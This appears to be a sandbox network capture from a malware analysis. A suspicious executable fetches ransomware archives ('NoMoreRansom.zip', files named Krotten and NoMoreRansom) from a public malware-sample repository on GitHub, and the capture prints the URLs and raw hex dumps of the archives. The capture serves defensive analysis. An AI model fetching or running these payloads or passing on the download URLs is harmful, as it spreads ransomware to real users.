2022-09-29 12:50:35 UTC	1175	IN	Data Raw: c6 ac 9f 9c 59 df 28 43 2b eb 1c db 64 c8 8f a2 cd 3a 7a 3b fc 2f 74 e4 9e 7e 55 12 84 4a d6 f6 5e a5 6e d4 79 c4 e3 ef 8d 5e e2 57 26 83 31 66 76 9c 4e d8 6a 42 57 8b 30 74 d3 54 ab 8c 8a 93 cf 03 18 36 9d 6f db ea 0a 1e 49 a2 2d 97 78 c5 28 b6 39 39 f5 c6 d4 e8 b6 85 52 b6 c3 61 17 49 4a 72 46 e9 31 07 e4 c9 0b e4 11 7e a4 3e 03 06 37 81 36 56 8b e4 fe 48 a9 2b 72 da 59 c7 9d 68 fe 44 d1 40 db 97 db 7b 94 45 29 a0 8a 8c 95 3f ac 36 14 e7 d1 b6 b8 81 7f 36 da a5 e4 68 17 46 15 bd 2a f5 d5 d4 31 a7 ba 4a 26 7d e4 94 fe 5f 36 7d dd df 4b 14 2e c6 c6 c5 b4 e1 40 0f ae a7 9e 9d 69 b9 ee 77 58 80 6a 85 70 45 02 73 b6 b2 ed 74 14 72 c9 d1 17 45 ae be 68 78 44 3b 93 0f 40 fc 40 a1 f2 3d 49 51 da 85 dc 67 04 a2 87 04 14 c5 bb dd a8 8a 04 cc f3 3d e2 e1 c3 a9 41 Data Ascii: Y(C+d:z;/t~UJ^ny^W&1fvNjBW0tT6oI-x(99RaIJrF1~>76VH+rYhD@{E)?66hF*1J&}_6}K.@iwXjpEstrEhxD;@@=IQg=A
2022-09-29 12:50:35 UTC	1176	IN	Data Raw: 0d cf e4 fb f2 6f 7b 65 d3 fd a4 b2 64 d9 18 42 3d 98 97 14 4b fd 61 fa 15 8b 72 0e 61 e8 87 be d0 8f a1 76 24 9f 06 f0 78 ad 73 a5 10 81 8d ec 4a 89 98 bf b4 5a 63 8a fc 8b cd 60 f4 b2 5b 97 f7 23 89 43 55 23 fb 8d 5d a1 3f 3c c2 f8 3d 7c de 4a 0d ea c5 ff 56 3b cb 5e a2 34 ff 5c 2b 0c 05 b1 66 3a ee 43 08 c9 f7 ac 4e 28 9d 39 1d b4 20 cc 32 26 2a 7e ca 47 5c 65 b6 6b 1f 9c 4e 2a 24 7d 0f d9 75 9b ac 6e 79 05 71 83 07 01 42 33 e5 01 7c fc f0 1a 5c 63 14 3e ad 02 32 ba 4c ac c4 84 69 f9 0d d0 81 b2 19 9c 3b 18 4b a6 e0 d1 59 01 24 bb 14 b7 8f 6f be 9f 1f 4d 65 0a af b7 a6 e5 55 34 7c e7 5f 04 fd fd d5 c4 37 67 93 d2 28 7a 10 d6 d6 1d 38 d9 d0 1e 7f 3e 7a a1 2b 83 b8 93 86 c4 ff 7a d9 f4 ad 0d 8d 71 9a b9 92 d5 ec 74 46 02 c0 70 87 5c e9 47 a7 06 30 7f d2 Data Ascii: o{edB=Karav$xsJZc`[#CU#]?<=\|JV;^4\+f:CN(9 2&~G\ekN$}unyqB3\|\c>2Li;KY$oMeU4\|_7g(z8>z+zqtFp\G0
2022-09-29 12:50:35 UTC	1178	IN	Data Raw: 6b 4a 84 b3 23 2b 5e 0c 14 ad f7 8e 38 63 a4 30 d3 90 b9 fc 09 56 32 27 06 c0 82 72 33 f2 82 72 4a b8 32 88 c3 29 05 d6 2f e1 5e ff 7f 22 20 f8 65 c6 d2 8d 2a 6a 98 73 2c 30 a0 3b 7e 37 c4 92 09 e0 7e 6c 61 18 67 32 6b fb c7 8d c1 17 d5 75 7d 3c 3a 99 f5 c8 38 09 82 a6 c3 75 fa b9 9b 8e da 5a 50 4c 75 39 e6 21 ec c0 f3 c5 b1 ae 5e d8 df 10 f1 5b ab 53 dc 60 28 b0 f7 4e 58 3c 9b 19 0f 24 88 ac 3d ae 91 6a 91 7e dc 3d 3d 23 0d 1f 0c 7e e4 20 e4 70 af 87 0a 00 2e f4 c1 20 a9 b6 af ce fc c7 8f 56 ca bf cb 85 78 de eb e2 d8 18 08 58 7f 17 b9 81 01 4a e9 cd ba 79 4f 63 b2 72 79 26 dd 8c 30 f0 a5 95 01 82 63 0d b7 32 b7 1d 28 2e 6e 87 be 62 76 0c 6a 68 ae 4f db c6 43 43 d1 68 b7 13 f2 b4 0d 84 cf 70 50 7b 53 17 ab 97 52 c7 49 72 6f 42 82 67 de 18 23 d6 10 bc 21 Data Ascii: kJ#+^8c0V2'r3rJ2)/^" e*js,0;~7~lag2ku}<:8uZPLu9!^[S`(NX<$=j~==#~ p. VxXJyOcry&0c2(.nbvjhOCChpP{SRIroBg#!
2022-09-29 12:50:35 UTC	1179	IN	Data Raw: aa 77 e9 3e b9 5b d3 c3 94 de e2 a3 bd cc fb 37 9f 00 da 4e cd bf 71 81 4c f9 02 f4 fd 6f 4b 87 35 1e 7f e5 12 50 23 d3 50 4b 01 02 3f 00 33 00 01 00 63 00 cf a3 e4 38 00 00 00 00 2f 66 00 00 29 d5 00 00 16 00 2f 00 00 00 00 00 00 00 20 00 00 00 00 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 4b 72 6f 74 74 65 6e 2e 65 78 65 0a 00 20 00 00 00 00 00 01 00 18 00 00 3f b1 a7 fb dd c8 01 a6 0c 3e 45 f0 03 d4 01 a6 0c 3e 45 f0 03 d4 01 01 99 07 00 02 00 41 45 03 08 00 50 4b 05 06 00 00 00 00 01 00 01 00 73 00 00 00 6e 66 00 00 00 00 Data Ascii: w>[7NqLoK5P#PK?3c8/f)/ Endermanch@Krotten.exe ?>E>EAEPKsnf

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.6	49759	140.82.121.4	443	C:\Users\user\Desktop\irH9zMhZub.exe

Timestamp	kBytes transferred	Direction	Data
2022-09-29 12:51:24 UTC	1179	OUT	GET /Endermanch/MalwareDatabase/raw/master/ransomwares/NoMoreRansom.zip HTTP/1.1 Host: github.com
2022-09-29 12:51:24 UTC	1179	IN	HTTP/1.1 302 Found Server: GitHub.com Date: Thu, 29 Sep 2022 12:51:14 GMT Content-Type: text/html; charset=utf-8 Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With Access-Control-Allow-Origin: https://render.githubusercontent.com Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/NoMoreRansom.zip Cache-Control: no-cache Strict-Transport-Security: max-age=31536000; includeSubdomains; preload X-Frame-Options: deny X-Content-Type-Options: nosniff X-XSS-Protection: 0 Referrer-Policy: no-referrer-when-downgrade Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
2022-09-29 12:51:24 UTC	1180	IN	Data Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.2.6	49760	185.199.108.133	443	C:\Users\user\Desktop\irH9zMhZub.exe

Timestamp	kBytes transferred	Direction	Data
2022-09-29 12:51:24 UTC	1182	OUT	GET /Endermanch/MalwareDatabase/master/ransomwares/NoMoreRansom.zip HTTP/1.1 Host: raw.githubusercontent.com
2022-09-29 12:51:24 UTC	1182	IN	HTTP/1.1 200 OK Connection: close Content-Length: 938498 Cache-Control: max-age=300 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Content-Type: application/zip ETag: "a8e6304ff5320ec60c4e2f8e3ebb31e42a5adf4691dfa4eaa6f24b4dad08bbfd" Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block X-GitHub-Request-Id: D4EA:67BC:3D674:FA8B9:63359346 Accept-Ranges: bytes Date: Thu, 29 Sep 2022 12:51:24 GMT Via: 1.1 varnish X-Served-By: cache-mxp6948-MXP X-Cache: HIT X-Cache-Hits: 1 X-Timer: S1664455885.821877,VS0,VE2 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * X-Fastly-Request-ID: b309f3b971f31fe73ea16cd5a67011417ee54a29 Expires: Thu, 29 Sep 2022 12:56:24 GMT Source-Age: 1
2022-09-29 12:51:24 UTC	1183	IN	Data Raw: 50 4b 03 04 14 00 01 00 08 00 98 82 ba 4a dc 69 b2 15 46 51 0e 00 00 ca 15 00 1b 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 4e 6f 4d 6f 72 65 52 61 6e 73 6f 6d 2e 65 78 65 b5 26 50 b8 1f d7 f7 5c 00 a2 4a af d9 76 74 a7 44 28 27 ef 18 69 bb ab c2 21 d8 7d 8d cf 83 56 8f 2f be 64 10 fd 69 17 eb d0 5e f2 d1 6a a5 9a e0 56 c4 b3 e4 ff ef a6 06 ea d6 bb 64 6b 3f ea f9 6f 23 d2 9f e5 e4 cd 7d d2 36 bb 46 c8 f4 08 1a 00 0f 17 49 5a 2b cf 96 7e c2 48 0e 6c 80 6f ea ba 11 a3 fc ab 7a 93 b5 f5 72 91 10 54 4a a5 5e c7 31 ec 37 cb 13 62 26 42 d9 40 f7 43 ab dd a9 a1 a0 e4 29 c6 f9 df 33 34 5d 1a c8 97 96 7e cd dd d4 6d d2 f7 59 b8 fe 1d 7d fb 12 f3 50 a2 72 b6 cf dc 3e fb 7a ff 18 09 a8 c1 22 05 34 54 9a 3e dc 1b c6 15 06 cb f9 a0 a0 5c 0d b6 3f e9 b8 c9 45 cc d1 03 Data Ascii: PKJiFQEndermanch@NoMoreRansom.exe&P\JvtD('i!}V/di^jVdk?o#}6FIZ+~HlozrTJ^17b&B@C)34]~mY}Pr>z"4T>\?E
2022-09-29 12:51:24 UTC	1184	IN	Data Raw: 8f 51 ef 9a 13 32 e0 6a a5 1c 6b 8d 46 dd 80 f7 0c e0 e9 06 3b cf b7 80 a4 34 00 f1 dd ce dd 89 6e 16 17 14 27 c1 30 7f 09 bb 51 a7 68 10 82 fe d7 fa 10 d7 6b 77 5b 29 43 95 99 55 67 17 40 c8 01 3f 1f af fd a3 06 32 78 b4 d9 6e 50 8a 94 c5 0b 1b 29 d4 e9 03 c6 25 75 0a 65 61 97 53 a3 e6 25 7f c9 41 49 8b f5 b4 52 ca 0e 29 28 09 b6 54 ce a0 07 26 20 4d 23 76 df 0f 91 b9 dd 85 a7 17 cc 9c 09 83 cd 3b cc 7f 75 86 42 7f 7c ae 89 e9 11 fe 37 49 60 9a 92 b3 e9 0a 85 c2 84 66 96 43 a0 08 e9 12 f1 86 29 d1 fd 6d 11 b2 72 9c 2c e1 7f 6c 2e 5d 33 f3 da 43 5a 42 44 78 67 70 a0 0c 88 27 21 85 23 32 c0 80 e8 60 89 cb e5 f9 0f 3a ef d7 cf c3 fe 77 54 63 2b 65 20 2c 6a f1 d5 6b 00 2b 21 1c 35 9c 2f ba 21 21 c4 b8 e5 2e 17 2f 63 72 e8 f1 e4 22 80 e9 03 f5 df 52 88 7c bf Data Ascii: Q2jkF;4n'0Qhkw[)CUg@?2xnP)%ueaS%AIR)(T& M#v;uB\|7I`fC)mr,l.]3CZBDxgp'!#2`:wTc+e ,jk+!5/!!./cr"R\|
2022-09-29 12:51:24 UTC	1185	IN	Data Raw: c9 bb 93 d4 21 ae db b3 7e f7 5d 47 1d 3b 97 c6 0c 89 72 5a 63 6f a4 f9 4a 0a 94 ef 4d 42 e8 5e 8e 00 62 2b 24 56 5f d6 79 ab 67 88 e8 da 2e 3b ca a5 49 ab c0 03 71 fd ef a2 3c c0 89 6b ba a7 75 69 60 86 e7 f2 75 60 d5 10 06 08 59 3e c8 98 76 f8 16 2b 63 32 36 e5 f8 a2 bd ad 58 26 0b 65 7d 72 07 a1 f3 cc e2 19 d8 1e 54 2e 04 34 9a ce 8b d9 ed 8f eb e7 f5 9d ef 34 87 81 3c 62 3d 4b e2 80 e7 c2 e4 13 fa bf 55 9c b9 2b df 54 c4 62 4d 80 3c 7a c7 7e ff d9 4c 54 8d df f4 12 1b ad ef 59 f6 52 09 e4 7f c1 17 57 82 07 2f 7b 30 82 e7 77 37 a0 2e 76 65 2c 9c f2 c4 f3 5a fd 0d 7d 42 bb 26 d7 c8 c9 2e 1f 03 4a 42 ba bf 24 d1 85 13 64 01 46 d0 04 24 ab 34 cd ae 7b 01 90 85 45 e9 07 65 96 ef 2a c6 5d 42 5a bc cd 5a 8d 1b 84 c2 03 d4 79 37 9f 3a 91 ec 39 7a 64 42 6a 97 Data Ascii: !~]G;rZcoJMB^b+$V_yg.;Iq<kui`u`Y>v+c26X&e}rT.44<b=KU+TbM<z~LTYRW/{0w7.ve,Z}B&.JB$dF$4{Ee*]BZZy7:9zdBj
2022-09-29 12:51:24 UTC	1187	IN	Data Raw: 98 b9 e5 68 92 db 22 0b b1 fa 44 78 da 49 85 45 85 17 60 35 10 c6 09 55 93 f7 24 4f ea ee 81 7c 8c 8a 0e f9 8a 94 96 cd 94 70 2e ae 14 70 60 ca e9 b6 89 56 a9 e9 f6 9c ff f8 f1 93 80 46 9c 86 ef 5a 05 41 02 64 14 08 73 07 99 b9 97 1a 8c 78 9f d8 1a 0f 0a da c4 dd 91 36 30 11 a8 17 b2 cf 5c ff 1e 84 e9 7b 2d 26 93 dd 77 34 5b 6e 5f f7 5e 64 14 8d 31 57 21 c2 99 fe 03 87 2d 9f fd 7f 15 a6 c5 9d ba 81 6d a0 b9 d2 bc 29 81 a5 25 bf ce 3a 91 cd 44 61 c1 8d ef be 1d b7 20 69 6d 2c 9d d2 f0 cf 51 00 d4 2d 1d 5e c6 dd ac 4f 43 3e c1 12 31 b3 8d 39 e1 fb 85 2b 32 d7 65 0b 8c bb ef cb 71 4b fa ba 96 1c 1d 25 85 25 e2 28 4b 43 db 04 43 84 5a 53 94 88 f5 14 40 55 70 6d 3d 8c cc d2 bf 89 06 df 49 26 4f f6 ce f7 7f a1 77 f1 a1 43 2c 89 2c f3 78 57 95 25 cb 51 0f fb 57 Data Ascii: h"DxIE`5U$O\|p.p`VFZAdsx60\{-&w4[n_^d1W!-m)%:Da im,Q-^OC>19+2eqK%%(KCCZS@Upm=I&OwC,,xW%QW
2022-09-29 12:51:24 UTC	1188	IN	Data Raw: 4c 76 fd dc 1f 9a 93 13 0a be e6 c1 77 55 d5 4c c0 38 6f 8c 40 c0 46 87 2f 32 7a 6a b6 9c 83 80 6b 29 75 8c a9 89 78 27 0e a9 2a 7d 4d c0 31 0f 34 c2 33 f4 03 c1 78 34 7a 0b bf b8 b0 94 4a 9e 3d 62 a1 05 32 e7 2b db 0a c0 1b 75 0b 89 4e fa 4b 13 06 12 9b 96 4e d0 45 c7 df a3 c3 0c 5f d0 1c 2d 8b 06 7f af 9f e6 d5 09 fb 15 05 40 04 68 f7 4f 97 97 30 5c 58 00 71 1a 23 b6 b0 5e 81 e6 0d e6 ad 82 fc 3a ea 40 f8 07 87 6a 9a fe 1c 44 63 a1 ba 6e a0 ea 24 de 20 08 49 62 fd e7 ee e4 09 bf f2 b7 87 b8 a6 a1 3e 06 2f c7 47 c2 90 df 50 47 88 9e 31 a6 d4 2e 18 20 54 bc 4b 1f d8 c7 fb 93 31 4d 2b a2 62 5c e8 c0 10 33 e3 4b a4 c7 3b 3a d6 4e a7 9f 5e 17 18 a6 d8 fa 9a 2f b8 98 ad ee 89 e9 34 2d d5 e9 36 49 31 b2 be 37 82 42 1d 7a 28 0a 04 57 0d 33 9b c0 8d f5 7c 1f e5 Data Ascii: LvwUL8o@F/2zjk)ux'*}M143x4zJ=b2+uNKNE_-@hO0\Xq#^:@jDcn$ Ib>/GPG1. TK1M+b\3K;:N^/4-6I17Bz(W3\|
2022-09-29 12:51:24 UTC	1189	IN	Data Raw: 84 ba ea 78 a2 22 8b 60 1e 4a 78 a8 c8 05 7e fc 3d 96 4c 66 f6 62 40 6e 89 d1 60 55 13 9c b0 69 e8 fd 06 cd 85 a4 e8 29 16 10 7a 9b 1e 77 bc 36 f8 00 62 f9 c0 da b4 30 b5 2f 66 c5 6d 6f 91 b2 33 83 d1 11 17 64 1a a2 0d a8 65 fc 1c 59 0c e6 33 f5 2b 38 1c 84 be cf 4b 36 07 9c 7a de 66 d1 4b fc 4b 3d 99 b1 4b 75 18 f0 d2 2a 0c a2 15 f4 be 9f 26 a1 92 2a b7 73 47 29 1b 5e 40 52 d3 c4 2e a0 89 4f 24 8f ef a4 62 58 d1 56 01 c9 24 91 7a 6a b1 fc 02 93 6b 4e e8 7f 7e 4d 63 e0 b8 74 c6 6e 3f bc 05 a3 54 95 ad ee 20 3f 20 38 a0 74 7c 91 7c 86 e3 5c 8a 03 fd 88 f7 48 b3 1d 44 6d 9d 83 e6 04 6a 96 ae a4 7f 2a 01 ff ff fa c7 a4 50 a7 33 6c f2 f3 40 c3 3e 8c 47 d6 b0 bc dc 5b 83 20 92 6a 6d 13 de ec 5a 96 46 a6 7b 08 60 fc fb ad 5c d8 47 8f ef 26 ea 41 37 49 84 72 d9 Data Ascii: x"`Jx~=Lfb@n`Ui)zw6b0/fmo3deY3+8K6zfKK=Ku&sG)^@R.O$bXV$zjkN~Mctn?T ? 8t\|\|\HDmj*P3l@>G[ jmZF{`\G&A7Ir
2022-09-29 12:51:24 UTC	1191	IN	Data Raw: 9d 8b 6c 4d a1 e7 92 17 e9 e7 16 fd 24 fa 64 fc d4 91 c9 12 8c 1c 56 44 8b 30 53 5e 41 2e b6 2c d3 fb cb 49 e9 61 f1 b0 6a 49 59 c6 77 29 60 7f 35 f7 23 e0 90 58 d9 b5 9f 1b 22 1f 19 8b f3 77 33 9f 8b fc b6 7b 69 89 bd 69 42 65 b5 26 39 fc 1a e2 ff f2 19 cd 39 a4 c4 3f 5d b7 df 8d 32 e0 c4 ed bc 8c 76 70 e3 3f 51 1e c6 ec 23 69 f5 90 92 90 79 28 76 e4 da 91 8e 17 49 a2 b1 75 16 ee 69 ab 25 3a b0 ee aa 07 ee 81 c8 22 6e 65 38 52 bb a1 d7 ca a8 2c 24 e8 a0 14 98 8d 52 f8 c8 b4 f4 c9 0e d5 9a ba 66 50 b6 8d c3 95 78 79 b6 94 b0 4f 7c f1 f7 62 4a a8 63 89 78 40 98 fe f2 f9 72 17 9f 00 96 f7 76 03 37 58 7a 44 b9 58 85 77 92 6e 3e e4 96 ec 07 2d f7 4a f5 2c 6d cd 5e 92 e0 d5 b7 a8 62 4e bb 41 a3 da 7c ff 64 8f 2b 6f e6 bc 7d ac 7d 2b 45 e1 bc 38 c2 f6 45 62 c8 Data Ascii: lM$dVD0S^A.,IajIYw)`5#X"w3{iiBe&99?]2vp?Q#iy(vIui%:"ne8R,$RfPxyO\|bJcx@rv7XzDXwn>-J,m^bNA\|d+o}}+E8Eb
2022-09-29 12:51:24 UTC	1192	IN	Data Raw: 67 54 d1 f2 15 cc 49 f1 b9 b7 d5 65 3d 3d c7 34 00 39 ac 3b 3a 26 d9 f6 20 ca 6b f2 26 40 8b bd 4f 85 9c 95 2a 0f 15 82 aa 2e 92 0e 04 75 a1 52 73 42 a5 c3 a3 0e 9b f4 94 74 a0 1c ea b4 0e 4d 3b 81 c0 30 94 c1 6d 4a ad e3 60 32 c0 97 7a 18 82 c1 bb 60 bb 36 47 c1 96 2a 51 c1 de 58 52 7d bb eb 6f 8f ef dc 64 64 75 d7 e9 f5 7c 94 90 2e 84 c2 68 98 43 d9 59 7c 7e 48 49 8c 2b 11 44 ac 39 11 16 b6 d7 40 80 2d 46 b5 8b 4f 0d 24 f8 dc b1 1a 14 13 a2 dc 76 97 57 0c 22 e8 ce 48 fe 19 e8 0e 8f 7c 32 d4 28 53 78 8c db a6 a3 c8 14 19 cb cc ce d8 02 56 d8 50 59 27 74 19 97 24 6f a8 51 5d 46 75 a4 68 87 2d 9a 71 e9 5b 6a 29 23 47 09 f1 42 39 5a 50 52 84 d3 c2 3b 77 b6 d6 19 bf 76 b7 d3 f1 07 cb 3b c3 1b 64 1d 5d fd a0 0f 7c 0e 9c f4 fb 0c 9a 7a 72 f3 89 92 8e 7b 65 42 Data Ascii: gTIe==49;:& k&@O.uRsBtM;0mJ`2z`6GQXR}oddu\|.hCY\|~HI+D9@-FO$vW"H\|2(SxVPY't$oQ]Fuh-q[j)#GB9ZPR;wv;d]\|zr{eB
2022-09-29 12:51:24 UTC	1193	IN	Data Raw: 77 40 ae 70 db fc a9 f2 4d 66 58 c8 8e a6 06 ef 3c e8 40 61 45 4a d3 55 6c 06 87 de 09 27 71 80 ee ef 1f 72 d7 1f 02 9a d0 ca 1f e9 7e 8a 8a d0 69 37 66 2b bd d3 79 0a 28 47 98 d7 d4 dc a2 6c 48 05 85 06 93 42 03 e6 a2 99 fa 96 f8 39 c2 cf 91 b5 35 54 20 f5 7f f3 03 87 b1 48 88 f7 f3 87 54 a1 71 fc e8 3d 51 1e d5 87 c8 b9 06 6b c6 9c 04 89 45 75 b7 b9 b8 b8 20 cf a2 1a 78 13 47 bf ec d1 b5 ed d8 a3 3f 7a a5 8b 1c 3f 69 92 69 5b 97 7f 49 67 ba b3 2c 33 68 0b 30 b8 fc b1 f3 ac 98 12 c9 05 54 ae 4a 8c e0 84 9c 5d 78 68 1e 63 0e 32 fb 90 4e 81 c0 d9 d8 66 e6 78 bb d5 b5 8a 58 50 8a 48 32 bd 25 e7 a3 0b 58 29 65 ed 02 5d 53 79 0a 0b 49 bf 5d 01 79 c7 41 f3 76 78 ec bd 62 6b 0e 06 ef 76 cb 67 14 4a 96 b8 8d 37 c2 09 cc 5f 6f 32 8e fb 5e 33 e7 00 21 a3 a2 20 e5 Data Ascii: w@pMfX<@aEJUl'qr~i7f+y(GlHB95T HTq=QkEu xG?z?ii[Ig,3h0TJ]xhc2NfxXPH2%X)e]SyI]yAvxbkvgJ7_o2^3!
2022-09-29 12:51:24 UTC	1195	IN	Data Raw: 05 a5 75 16 71 88 7f fb 06 ca 60 ae 74 34 65 f6 7b ab 2c 1d 19 ab 91 9c d6 5e 4a 3e f7 ed 34 e2 90 4e 8b fe f2 d3 1d cd c9 b9 3e cb f5 21 4f 77 e2 70 2e 6d 09 50 fb d2 f1 2e f9 f8 a8 70 c9 0f a8 a2 c6 b1 6d f2 d8 ad 01 59 13 4e 95 d6 1e 31 cc bd 2d 44 a8 4c 78 a3 73 87 6a fc dd 4f cb 61 fb 07 73 7c e6 09 ed 28 77 42 ff c0 b3 88 80 b6 5e d0 c1 cf af 6b d8 05 e3 a6 38 8f c0 51 bd 90 be 90 72 bc 14 6e 4e 10 3a c4 ca 79 73 33 44 97 b1 ac b9 31 ae 3e e5 a4 15 22 36 de 86 89 50 49 06 11 ca ea c0 11 23 72 4c 4b 4f 5c 0a cb cd 1a 76 ee 49 24 9c 42 4e f4 4b 5b a2 c8 d1 72 26 4c ff 53 c9 d1 9b bf 43 d8 21 7a da 31 8d 68 97 ed 78 c1 cf 9e 3a 3b 80 0d 64 17 76 a3 10 a8 92 12 7e a8 fe 40 ed f0 3c 6e f4 e5 70 39 21 a9 c3 32 1e 34 50 54 68 6e f1 4d ec 7b f7 9e ae 0f a9 Data Ascii: uq`t4e{,^J>4N>!Owp.mP.pmYN1-DLxsjOas\|(wB^k8QrnN:ys3D1>"6PI#rLKO\vI$BNK[r&LSC!z1hx:;dv~@<np9!24PThnM{
2022-09-29 12:51:24 UTC	1196	IN	Data Raw: ba 8f 38 62 51 a4 46 69 23 ea bd 56 15 43 98 09 b9 c1 dc 46 6a a9 90 5c 94 9c 77 2b 1b 9f 3a bf 1b 01 22 42 1b 22 ea b9 32 02 cc b4 11 54 4f 09 df 30 53 2b 4b 41 0f 5f ca b3 0f e7 23 ab ad 0a 41 c0 b5 dd c1 d8 83 ac bc cd 27 d0 ec 95 f7 b6 b4 ff 16 53 a7 9e f9 d7 0d d4 c5 70 9c d5 33 bc dc 7f 1c 9d 21 eb eb 93 dd 1b b1 fe 89 98 dd f1 d8 60 23 49 ff 25 c6 ef 65 b8 f0 85 04 f5 4e b4 38 bb 85 5a 01 61 c0 36 c5 04 da 25 26 dc d2 4c ba ff 1c 30 5c 62 a0 07 80 c6 97 46 6a 02 14 0a 49 41 ea 62 3e 3c 70 ba 2f fa 3f 44 8c 12 66 66 87 d7 47 97 7f 6b 68 19 5a 90 80 20 20 bf 0f 57 b2 c9 c0 9e 02 30 28 01 13 63 ee 89 22 b8 5f 8d 18 94 eb d4 2d c7 ee da 96 8b b3 66 8d 43 f7 31 87 ae d4 e8 74 6c 65 e9 07 32 43 a6 91 02 6a 06 c1 93 52 9c 77 ea 00 53 e3 a0 6e fb 18 a6 4c Data Ascii: 8bQFi#VCFj\w+:"B"2TO0S+KA_#A'Sp3!`#I%eN8Za6%&L0\bFjIAb><p/?DffGkhZ W0(c"_-fC1tle2CjRwSnL
2022-09-29 12:51:24 UTC	1197	IN	Data Raw: e7 87 3e d5 3b 5f de 41 c5 d4 bf c7 cd ce c5 b8 3f de 73 d3 a9 e6 6f 89 24 fa 27 71 bc ee 12 ac ff f8 0d 52 eb c4 e4 81 70 a7 1e d3 5c 2b 85 c9 a9 84 17 37 39 e9 b6 7b 9e 43 bc 3e 4c f6 13 03 b7 af af f0 68 5b 22 34 9a 20 a2 ff 2b 16 45 65 d5 e2 8d 94 0f 45 02 19 3d ed 11 54 91 80 af 37 74 47 42 36 d4 4b f8 16 58 46 b2 6e 89 e5 59 94 da e9 58 3e 8e e2 c6 03 a1 5b 27 58 11 5c 3e 8a bb 22 67 9d 9f 03 42 22 54 36 72 5c 3a 82 c1 10 22 6f ed d4 c5 cb ba fa 39 f4 c9 2e 59 99 48 8e 97 0a 5c a4 93 d1 41 04 24 b9 1d 04 eb 3a e1 f1 98 fc 8c 48 8a 8a 73 57 e8 76 99 ed 9d 0f ef 60 16 9e a3 35 65 89 13 08 df 20 7e 23 c2 36 39 19 7f d2 e8 33 6c 26 23 fe 09 50 0b 33 ae f1 37 b2 5a 9d 47 c1 c6 2a b9 3b 54 2a 64 55 31 1b f1 4c 0c 00 0f ea 2f 9b 46 f9 99 5e 56 70 e3 da 8a Data Ascii: >;_A?so$'qRp\+79{C>Lh["4 +EeE=T7tGB6KXFnYX>['X\>"gB"T6r\:"o9.YH\A$:HsWv`5e ~#693l&#P37ZG;TdU1L/F^Vp
2022-09-29 12:51:24 UTC	1198	IN	Data Raw: c2 81 32 b2 96 c1 5c 83 32 f9 d3 13 1c 80 e6 13 32 59 ee d1 31 dd 01 2a 0a f0 74 ae 04 70 cb 2d 41 a8 19 ef c8 00 02 a4 cd 09 9c 78 47 bb 30 f1 91 ca 02 56 16 f7 58 19 7f 78 f1 17 28 14 18 83 e3 04 63 38 aa 6e 67 cd 26 2f b5 b8 84 78 8f 9a c7 ac 62 ce fe 8f aa 51 b2 3e f5 03 d0 e3 28 a5 f9 e1 94 94 33 d6 76 e1 80 ce 2d 90 a1 d9 bc 14 b1 00 56 6b 48 61 1c 32 7f 90 41 a7 ec bd 68 ec bf c5 6c fc 8b 61 c8 7f 7b 52 05 fd 34 a0 30 90 ed 54 29 32 d6 0f 1f 35 94 3e 77 0e 90 3f c4 d7 78 22 7a ba 72 a3 01 fe b3 9b b0 57 9e 25 1b 20 fd de 71 e2 ae 55 c3 f6 76 25 08 c4 a0 5d 9f bb eb e7 53 e8 95 dc 2a 0f 46 48 7a 68 82 6b 96 eb 8b a0 10 17 3b 16 85 21 14 58 55 49 93 9a 50 b3 e8 23 6b ec fb d6 df 17 aa 12 8b 07 89 68 fb 43 4f b7 77 80 75 e2 c4 2f 07 50 f6 a2 9b 2a 7f Data Ascii: 2\22Y1tp-AxG0VXx(c8ng&/xbQ>(3v-VkHa2Ahla{R40T)25>w?x"zrW% qUv%]SFHzhk;!XUIP#khCOwu/P*
